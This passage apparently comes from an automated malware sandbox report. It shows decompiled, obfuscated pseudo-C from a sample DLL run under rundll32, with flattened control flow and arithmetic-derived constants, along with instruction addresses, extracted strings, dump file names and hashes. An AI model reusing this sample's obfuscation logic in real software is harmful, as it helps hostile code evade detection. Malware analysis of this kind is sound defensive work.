				_v96 = 0x583;
				_v96 = _v96 + 0xd9a1;
				_v96 = _v96 / _t263;
				_v96 = _v96 + 0x3e5;
				_v96 = _v96 ^ 0x000008a1;
				_v100 = 0x8d71;
				_t264 = 0x53;
				_v100 = _v100 * 0xd;
				_v100 = _v100 >> 4;
				_v100 = _v100 / _t264;
				_v100 = _v100 ^ 0x00004ab6;
				_v76 = 0xeaf8;
				_v76 = _v76 << 0xb;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0xeaf83e17;
				_v104 = 0xfdf7;
				_v104 = _v104 + 0xffff8125;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x00004c62;
				_v40 = 0x8162;
				_v40 = _v40 | 0xc691c83f;
				_v40 = _v40 ^ 0xc691a24d;
				_v72 = 0x9e4d;
				_v72 = _v72 << 0xc;
				_v72 = _v72 + 0xffff6436;
				_v72 = _v72 ^ 0x09e41bc8;
				_v92 = 0x78eb;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 | 0xec9d9334;
				_v92 = _v92 << 0xc;
				_v92 = _v92 ^ 0xd933d049;
				_v36 = 0x856f;
				_t265 = 0x39;
				_v36 = _v36 / _t265;
				_v36 = _v36 ^ 0x00001c57;
				_v60 = 0x6631;
				_v60 = _v60 >> 2;
				_v60 = _v60 + 0xffffdfe4;
				_v60 = _v60 ^ 0xffffcf25;
				_v64 = 0x3444;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00000359;
				_v68 = 0xe444;
				_t266 = 0x50;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x16a0;
				_v68 = _v68 ^ 0x00006446;
				_v32 = 0xb62e;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x00006ec1;
				_v52 = 0x9375;
				_v52 = _v52 >> 8;
				_t267 = 0x71;
				_v52 = _v52 * 0xb;
				_v52 = _v52 ^ 0x00007061;
				_v88 = 0x468b;
				_v88 = _v88 / _t267;
				_v88 = _v88 * 0x47;
				_v88 = _v88 >> 2;
				_v88 = _v88 ^ 0x0000270a;
				_t298 = _v28;
				_t303 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t299 - 0x23ec3b81;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t299 = 0x2b5ba3b6;
							continue;
						}
						if(_t299 == 0x591e35e) {
							E1001B981(_v40, _v8 + 1,  *0x100221b0 + 0x10, _v12, _v72, _v92);
							_t304 =  &(_t304[4]);
							_t259 = 1;
							_t299 = 0x3378ea2d;
							 *((intOrPtr*)( *0x100221b0)) = _v16;
							continue;
						}
						if(_t299 == 0x5f14f0f) {
							_t254 = E1001CAA0( &_v24, _v96,  &_v16, _v100, _v76, _v104);
							_t304 =  &(_t304[4]);
							asm("sbb esi, esi");
							_t299 = ( ~_t254 & 0xd218f931) + 0x3378ea2d;
							continue;
						}
						if(_t299 == 0xba7b4d4) {
							_t256 = E1001B806(_v108, _t303, _v112, _v80,  &_v28);
							_t298 = _t256;
							_t304 =  &(_t304[3]);
							if(_t256 == 0) {
								L23:
								return _t259;
							}
							_t299 = 0x176f3fd8;
							continue;
						}
						if(_t299 != 0x176f3fd8) {
							goto L20;
						} else {
							_t299 = 0x2e66d4aa;
							if(_v28 > 2) {
								_t258 = E10015AB8(_v116, _v44, _v48,  *((intOrPtr*)(_t298 + 8)),  &_v20, _v84);
								_t304 =  &(_t304[4]);
								_v24 = _t258;
								if(_t258 != 0) {
									_t299 = 0x5f14f0f;
								}
							}
							continue;
						}
					}
					if(_t299 == 0x2b5ba3b6) {
						_t303 = E1001B8E7();
						_t299 = 0xba7b4d4;
						goto L20;
					}
					if(_t299 == 0x2e66d4aa) {
						E10007BE0(_v32, _t298, _v52, _v88);
						goto L23;
					}
					if(_t299 != 0x3378ea2d) {
						goto L20;
					}
					E100091CD(_v36, _v60, _v64, _v24, _v68);
					_t304 =  &(_t304[3]);
					_t299 = 0x2e66d4aa;
					goto L1;
					L20:
				} while (_t299 != 0x16656518);
				goto L23;
			}

0x10006bc0
0x10006bc3
0x10006bcd
0x10006bd2
0x10006bda
0x10006be2
0x10006bea
0x10006bef
0x10006bf4
0x10006bf9
0x10006c01
0x10006c09
0x10006c0e
0x10006c16
0x10006c1b
0x10006c23
0x10006c35
0x10006c3a
0x10006c40
0x10006c48
0x10006c4a
0x10006c52
0x10006c57
0x10006c5f
0x10006c6b
0x10006c70
0x10006c76
0x10006c7b
0x10006c83
0x10006c90
0x10006c93
0x10006c97
0x10006c9f
0x10006ca7
0x10006caf
0x10006cb7
0x10006cbf
0x10006cc8
0x10006ccc
0x10006cd4
0x10006cdc
0x10006cec
0x10006cf0
0x10006cf8
0x10006d00
0x10006d0d
0x10006d0e
0x10006d12
0x10006d1d
0x10006d21
0x10006d29
0x10006d31
0x10006d36
0x10006d3b
0x10006d43
0x10006d4b
0x10006d53
0x10006d58
0x10006d5d
0x10006d65
0x10006d6f
0x10006d77
0x10006d7f
0x10006d87
0x10006d8c
0x10006d94
0x10006d9c
0x10006da4
0x10006da9
0x10006db1
0x10006db6
0x10006dbe
0x10006dcc
0x10006dd1
0x10006dd7
0x10006ddf
0x10006de7
0x10006dec
0x10006df4
0x10006dfc
0x10006e04
0x10006e09
0x10006e0e
0x10006e16
0x10006e22
0x10006e27
0x10006e2d
0x10006e35
0x10006e3d
0x10006e45
0x10006e4a
0x10006e52
0x10006e5a
0x10006e64
0x10006e65
0x10006e69
0x10006e71
0x10006e7f
0x10006e88
0x10006e8c
0x10006e91
0x10006e99
0x10006e9d
0x10006e9d
0x10006ea1
0x10006ea1
0x10006ea1
0x10006ea1
0x10006ea7
0x00000000
0x00000000
0x10006ead
0x10006fc6
0x00000000
0x10006fc6
0x10006eb9
0x10006fa3
0x10006fb6
0x10006fb9
0x10006fba
0x10006fbf
0x00000000
0x10006fbf
0x10006ec5
0x10006f5e
0x10006f63
0x10006f6a
0x10006f72
0x00000000
0x10006f72
0x10006ecd
0x10006f29
0x10006f2e
0x10006f30
0x10006f35
0x10007044
0x1000704a
0x1000704a
0x10006f3b
0x00000000
0x10006f3b
0x10006ed5
0x00000000
0x10006edb
0x10006ee0
0x10006ee5
0x10006eff
0x10006f04
0x10006f07
0x10006f0d
0x10006f0f
0x10006f0f
0x10006f0d
0x00000000
0x10006ee5
0x10006ed5
0x10006fd6
0x10007017
0x10007019
0x00000000
0x10007019
0x10006fde
0x1000703a
0x00000000
0x10007040
0x10006fe6
0x00000000
0x00000000
0x10006ffc
0x10007001
0x10007004
0x00000000
0x1000701e
0x1000701e
0x00000000

Strings

D4, xrefs: 10006DFC
Fd, xrefs: 10006E35
1f, xrefs: 10006DDF
A, xrefs: 10006C23
ZQ, xrefs: 10006C9F
bL, xrefs: 10006D5D
ap, xrefs: 10006E69
', xrefs: 10006E91
x, xrefs: 10006D9C
-x3, xrefs: 10006FBA
(], xrefs: 10006C97
-x3, xrefs: 10006FE0

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$(]$-x3$-x3$1f$A$D4$Fd$ZQ$ap$bL$x
API String ID: 0-4015965578
Opcode ID: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
Instruction ID: 7f07636c7d856d37613f0c6add9871aecd81a47647e8cfb522ba5c80404945ec
Opcode Fuzzy Hash: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
Instruction Fuzzy Hash: 95C141729083419FE714CF25C88A40BBBE2FBC4798F20891DF599962A4D7B9D948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001B3FE, Relevance: 14.0, Strings: 11, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001B3FE() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				void* _t216;
				void* _t229;
				intOrPtr _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				unsigned int* _t266;

				_t266 =  &_v1136;
				_v1052 = 0x59feef;
				_v1048 = 0x2a3fe0;
				_t229 = 0x3abfade2;
				_t258 = 0;
				_v1044 = 0;
				_v1096 = 0x3e7b;
				_v1096 = _v1096 << 8;
				_v1096 = _v1096 | 0x4b45bfac;
				_v1096 = _v1096 ^ 0x4b7f9484;
				_v1120 = 0xeeae;
				_v1120 = _v1120 + 0xffff949c;
				_v1120 = _v1120 + 0xffff26d2;
				_v1120 = _v1120 ^ 0xc3b4e966;
				_v1120 = _v1120 ^ 0x3c4b1d4d;
				_v1088 = 0x77a0;
				_v1088 = _v1088 | 0x40386f55;
				_v1088 = _v1088 << 0x10;
				_v1088 = _v1088 ^ 0x7ff5165c;
				_v1064 = 0xf0bf;
				_v1064 = _v1064 << 9;
				_v1064 = _v1064 ^ 0x01e162a5;
				_v1072 = 0x124d;
				_t259 = 0x72;
				_v1072 = _v1072 / _t259;
				_v1072 = _v1072 ^ 0x00002ee6;
				_v1128 = 0x5292;
				_v1128 = _v1128 << 8;
				_v1128 = _v1128 + 0xe9bf;
				_v1128 = _v1128 + 0x3238;
				_v1128 = _v1128 ^ 0x0053b92a;
				_v1136 = 0xc2f1;
				_v1136 = _v1136 + 0x6410;
				_v1136 = _v1136 >> 0xc;
				_v1136 = _v1136 + 0x63d1;
				_v1136 = _v1136 ^ 0x00000ac7;
				_v1112 = 0x7058;
				_t260 = 0x4b;
				_v1112 = _v1112 * 0xd;
				_v1112 = _v1112 << 6;
				_v1112 = _v1112 + 0x987c;
				_v1112 = _v1112 ^ 0x016df42c;
				_v1100 = 0x41a9;
				_v1100 = _v1100 + 0xffffec41;
				_v1100 = _v1100 + 0xffff9ba9;
				_v1100 = _v1100 ^ 0xffffd6d5;
				_v1104 = 0x872a;
				_v1104 = _v1104 / _t260;
				_v1104 = _v1104 >> 0x10;
				_v1104 = _v1104 ^ 0x0000287c;
				_v1080 = 0x8003;
				_v1080 = _v1080 | 0x7adfffb6;
				_v1080 = _v1080 ^ 0x7adf96d6;
				_v1084 = 0x5426;
				_v1084 = _v1084 + 0xe4e2;
				_v1084 = _v1084 ^ 0xc6a85055;
				_v1084 = _v1084 ^ 0xc6a96844;
				_v1092 = 0x916a;
				_v1092 = _v1092 >> 0x10;
				_v1092 = _v1092 | 0x14ea685d;
				_v1092 = _v1092 ^ 0x14ea6f72;
				_v1056 = 0x7cb0;
				_v1056 = _v1056 >> 7;
				_v1056 = _v1056 ^ 0x000061a1;
				_v1132 = 0x4cf9;
				_v1132 = _v1132 ^ 0x2fb41e14;
				_v1132 = _v1132 ^ 0xb509e885;
				_v1132 = _v1132 + 0x3858;
				_v1132 = _v1132 ^ 0x9abd8624;
				_v1124 = 0xb90b;
				_v1124 = _v1124 | 0x9d483c7c;
				_t261 = 0x31;
				_v1124 = _v1124 / _t261;
				_v1124 = _v1124 << 0x10;
				_v1124 = _v1124 ^ 0xbab966f1;
				_v1076 = 0x4837;
				_t262 = 0x28;
				_v1076 = _v1076 * 0x42;
				_v1076 = _v1076 ^ 0x39645d85;
				_v1076 = _v1076 ^ 0x3976b123;
				_v1060 = 0xa4fd;
				_v1060 = _v1060 / _t262;
				_v1060 = _v1060 ^ 0x00000d98;
				_v1068 = 0x96bf;
				_v1068 = _v1068 | 0xc49b968d;
				_v1068 = _v1068 ^ 0xc49bbea0;
				_v1108 = 0xf482;
				_v1108 = _v1108 + 0xffffa317;
				_v1108 = _v1108 | 0x011b1071;
				_v1108 = _v1108 << 2;
				_v1108 = _v1108 ^ 0x046e6bfd;
				_v1116 = 0x4fbc;
				_v1116 = _v1116 + 0xffff81fd;
				_v1116 = _v1116 + 0xffff31d8;
				_t263 = 5;
				_v1116 = _v1116 / _t263;
				_v1116 = _v1116 ^ 0x33332c42;
				do {
					while(_t229 != 0xe952e95) {
						if(_t229 == 0x1126b32b) {
							_push(0x10001000);
							_push(_v1128);
							E100163BF(E1001BF25(_v1064, _v1072, __eflags), __eflags, _v1112, _v1100,  &_v1040,  *0x100221b0, _v1104,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1080);
							E1001C5F7(_v1084, _v1092, _v1056, _v1132, _t217);
							_t266 =  &(_t266[0xb]);
							_t229 = 0xe952e95;
							continue;
						} else {
							if(_t229 == 0x2ea5cfd6) {
								E10008C0C(_v1096, __eflags, _v1120, _v1088,  &_v520);
								_t266 =  &(_t266[3]);
								_t229 = 0x1126b32b;
								continue;
							} else {
								if(_t229 == 0x3423edaf) {
									E1001654F(_v1068, _v1108, _v1116,  &_v1040);
								} else {
									if(_t229 != 0x3abfade2) {
										goto L10;
									} else {
										_t229 = 0x2ea5cfd6;
										continue;
									}
								}
							}
						}
						L13:
						return _t258;
					}
					_t216 = E10013D7C( &_v1040, __eflags, _v1076, _v1060,  &_v520);
					_t266 =  &(_t266[3]);
					__eflags = _t216;
					_t258 =  !=  ? 1 : _t258;
					_t229 = 0x3423edaf;
					L10:
					__eflags = _t229 - 0x8af5a53;
				} while (__eflags != 0);
				goto L13;
			}

0x1001b3fe
0x1001b404
0x1001b40e
0x1001b416
0x1001b41f
0x1001b421
0x1001b425
0x1001b42d
0x1001b432
0x1001b43a
0x1001b442
0x1001b44a
0x1001b452
0x1001b45a
0x1001b462
0x1001b46a
0x1001b472
0x1001b47a
0x1001b47f
0x1001b487
0x1001b48f
0x1001b494
0x1001b49c
0x1001b4aa
0x1001b4af
0x1001b4b5
0x1001b4bd
0x1001b4c5
0x1001b4ca
0x1001b4d2
0x1001b4da
0x1001b4e2
0x1001b4ea
0x1001b4f2
0x1001b4f7
0x1001b4ff
0x1001b507
0x1001b514
0x1001b515
0x1001b519
0x1001b51e
0x1001b526
0x1001b52e
0x1001b536
0x1001b53e
0x1001b546
0x1001b54e
0x1001b55c
0x1001b560
0x1001b565
0x1001b56d
0x1001b575
0x1001b57d
0x1001b585
0x1001b58d
0x1001b595
0x1001b59d
0x1001b5a5
0x1001b5ad
0x1001b5b2
0x1001b5ba
0x1001b5c2
0x1001b5ca
0x1001b5cf
0x1001b5d7
0x1001b5df
0x1001b5e7
0x1001b5ef
0x1001b5f7
0x1001b5ff
0x1001b609
0x1001b621
0x1001b626
0x1001b62c
0x1001b631
0x1001b639
0x1001b646
0x1001b649
0x1001b64d
0x1001b655
0x1001b65d
0x1001b66d
0x1001b671
0x1001b679
0x1001b681
0x1001b689
0x1001b691
0x1001b699
0x1001b6a1
0x1001b6a9
0x1001b6ae
0x1001b6b6
0x1001b6be
0x1001b6c6
0x1001b6d2
0x1001b6d5
0x1001b6d9
0x1001b6e1
0x1001b6e1
0x1001b6ef
0x1001b731
0x1001b736
0x1001b77b
0x1001b794
0x1001b799
0x1001b79c
0x00000000
0x1001b6f1
0x1001b6f3
0x1001b725
0x1001b72a
0x1001b72d
0x00000000
0x1001b6f5
0x1001b6fb
0x1001b7f2
0x1001b701
0x1001b707
0x00000000
0x1001b70d
0x1001b70d
0x00000000
0x1001b70d
0x1001b707
0x1001b6fb
0x1001b6f3
0x1001b7f9
0x1001b805
0x1001b805
0x1001b7be
0x1001b7c5
0x1001b7c9
0x1001b7cb
0x1001b7ce
0x1001b7d3
0x1001b7d3
0x1001b7d3
0x00000000

Strings

7H, xrefs: 1001B639
., xrefs: 1001B4B5
X8, xrefs: 1001B5EF
B,33, xrefs: 1001B6D9
Xp, xrefs: 1001B507
82, xrefs: 1001B4D2
&T, xrefs: 1001B585
?*, xrefs: 1001B40E
Uo8@, xrefs: 1001B472
{>, xrefs: 1001B425
|(, xrefs: 1001B565

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &T$7H$82$B,33$Uo8@$X8$Xp${>$|($.$?*
API String ID: 0-2199102758
Opcode ID: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
Instruction ID: 713d83d0593c4ddd124331638c6b3f8c97ab7d5c779b93df35cbcb4d530e2ad3
Opcode Fuzzy Hash: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
Instruction Fuzzy Hash: 69A1107150C3809FE398CF25D88985BBBE1FBC4358F504A1DF5969A2A0D7B5CA89CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10016B45, Relevance: 12.9, Strings: 10, Instructions: 362
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10016B45() {
				void* _t369;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t374;
				signed int _t376;
				signed int _t378;
				signed int _t383;
				signed int _t389;
				void* _t395;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t442;
				void* _t446;

				 *((intOrPtr*)(_t446 + 0xa4)) = 0x772f9f;
				 *(_t446 + 0xac) = 0;
				 *(_t446 + 0xa8) = 0x789ddf;
				_t395 = 0x19391156;
				 *(_t446 + 0x6c) = 0xa1c8;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) << 0xd;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x14390001;
				 *(_t446 + 0xc) = 0xff4b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x5146fe6d;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x6d1dcf2b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) >> 5;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x01e2de71;
				 *(_t446 + 0x14) = 0x3f5c;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) | 0xe97d3723;
				 *(_t446 + 0xa0) = 0;
				_t22 = _t446 + 0x14; // 0xe97d3723
				 *(_t446 + 0x24) =  *_t22 * 0x76;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) >> 7;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x013f0ad7;
				 *(_t446 + 0x58) = 0x736e;
				 *(_t446 + 0x58) =  *(_t446 + 0x58) >> 1;
				_t435 = 0x7c;
				 *(_t446 + 0x5c) =  *(_t446 + 0x58) * 0x3a;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x000d12ba;
				 *(_t446 + 0xac) = 0xcefa;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) | 0xd3773184;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) ^ 0xd377a5bb;
				 *(_t446 + 0x14) = 0xdd96;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) + 0xffffff88;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x5290399f;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) << 0xd;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x1c901162;
				 *(_t446 + 0x74) = 0x655b;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) | 0xcd9490d8;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) ^ 0xcd94b23a;
				 *(_t446 + 0xa0) = 0x6c7f;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13eba5b2;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13ebbb7e;
				 *(_t446 + 0x94) = 0x7a54;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) / _t435;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) ^ 0x00007779;
				 *(_t446 + 0x4c) = 0xc640;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) >> 5;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a555cb4;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a557f70;
				 *(_t446 + 0x38) = 0x22ba;
				_t436 = 0x67;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) / _t436;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) >> 5;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0x267c;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x00005dad;
				 *(_t446 + 0xb0) = 0x929;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) + 0xffff6954;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) ^ 0xffff7ae2;
				 *(_t446 + 0x18) = 0xce9e;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) + 0xffff0e6b;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) | 0x6011ff3c;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) << 0xc;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) ^ 0xfff39ad2;
				 *(_t446 + 0x70) = 0xb975;
				_t431 = 0x16;
				 *(_t446 + 0x6c) =  *(_t446 + 0x70) / _t431;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x00003cc7;
				 *(_t446 + 0x64) = 0x8a7;
				_t437 = 0x17;
				 *(_t446 + 0x68) =  *(_t446 + 0x64) / _t437;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) + 0x9f8;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) ^ 0x00004bf2;
				 *(_t446 + 0xa8) = 0x9dab;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) >> 3;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) ^ 0x00004fe2;
				 *(_t446 + 0x8c) = 0xe61d;
				_t438 = 0x51;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) * 0x24;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) ^ 0x00200b54;
				 *(_t446 + 0x48) = 0x4300;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) >> 0xb;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) << 0xd;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) ^ 0x00016849;
				 *(_t446 + 0x44) = 0x14fb;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 4;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 3;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) ^ 0x000014fe;
				 *(_t446 + 0x64) = 0x908d;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) + 0xda51;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d67fea7;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d669443;
				 *(_t446 + 0x24) = 0x5ccc;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) * 0x61;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) / _t438;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e038eb;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e0646f;
				 *(_t446 + 0x78) = 0x27f;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) << 9;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) ^ 0x0004fb39;
				 *(_t446 + 0x1c) = 0x6d1d;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) >> 9;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) + 0xb85e;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7cb7d8;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7c6457;
				 *(_t446 + 0x54) = 0x7318;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xd;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0xffff7495;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0xffff5a53;
				 *(_t446 + 0x90) = 0xb397;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) + 0x578a;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) ^ 0x00016114;
				 *(_t446 + 0x34) = 0xd228;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) >> 4;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0x6376bfe7;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) << 0xe;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0xacb136be;
				 *(_t446 + 0x88) = 0x4cf0;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) + 0xaecf;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) ^ 0x0000fedc;
				 *(_t446 + 0x2c) = 0x629e;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0xd78b;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0x81bf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0xddf43aaf;
				 *(_t446 + 0x98) = 0xefe2;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) << 4;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x000efba1;
				 *(_t446 + 0x50) = 0xde18;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) + 0x6327;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) | 0xdc33595a;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) ^ 0xdc335491;
				 *(_t446 + 0x7c) = 0xe244;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f81d147;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f817701;
				 *(_t446 + 0x9c) = 0xcfc5;
				_t439 = 0x13;
				_t444 =  *(_t446 + 0x68);
				 *(_t446 + 0x98) =  *(_t446 + 0x9c) / _t439;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x00007994;
				 *(_t446 + 0xa0) = 0xdcf0;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) >> 5;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x00004aa7;
				 *(_t446 + 0x80) = 0xb565;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) | 0xd87788ca;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) ^ 0xd877c5fd;
				 *(_t446 + 0x38) = 0x6376;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xd60ebee2;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0xdd50;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x3a07644d;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xec08a801;
				 *(_t446 + 0x3c) = 0x1f0d;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) | 0xe9d4bb8b;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0x531b6b57;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0xbacf9971;
				 *(_t446 + 0x5c) = 0x2ec0;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) << 0xc;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) >> 0xe;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x00004eb6;
				 *(_t446 + 0x54) = 0xc421;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0x4f00;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xa;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0x0000676b;
				 *(_t446 + 0x2c) = 0x5f98;
				_t393 =  *(_t446 + 0x68);
				_t432 =  *(_t446 + 0x68);
				_t440 =  *(_t446 + 0x68);
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) / _t431;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xc;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) * 0x50;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0x15b80003;
				while(1) {
					L1:
					_t369 = 0x667bbe4;
					L2:
					while(_t395 != 0x333430e) {
						if(_t395 == _t369) {
							_t372 = E10016409( *(_t446 + 0x70),  *(_t446 + 0x90),  *(_t446 + 0x4c), _t432, _t395, _t440, _t446 + 0xc4,  *(_t446 + 0x94), _t395,  *((intOrPtr*)(_t446 + 0x84)),  *(_t446 + 0x24), _t393, _t395,  *(_t446 + 0x50));
							_t446 = _t446 + 0x30;
							__eflags = _t372;
							if(_t372 == 0) {
								_t373 =  *(_t446 + 0xb0);
							} else {
								_t442 = _t432;
								while(1) {
									__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
									if( *((intOrPtr*)(_t442 + 4)) != 4) {
										goto L19;
									}
									L18:
									_t335 = _t442 + 0xc; // 0x4bfe
									_t378 = E1000D867(_t444,  *(_t446 + 0x98), _t335,  *(_t446 + 0x38),  *(_t446 + 0x88),  *((intOrPtr*)(_t446 + 0x28)));
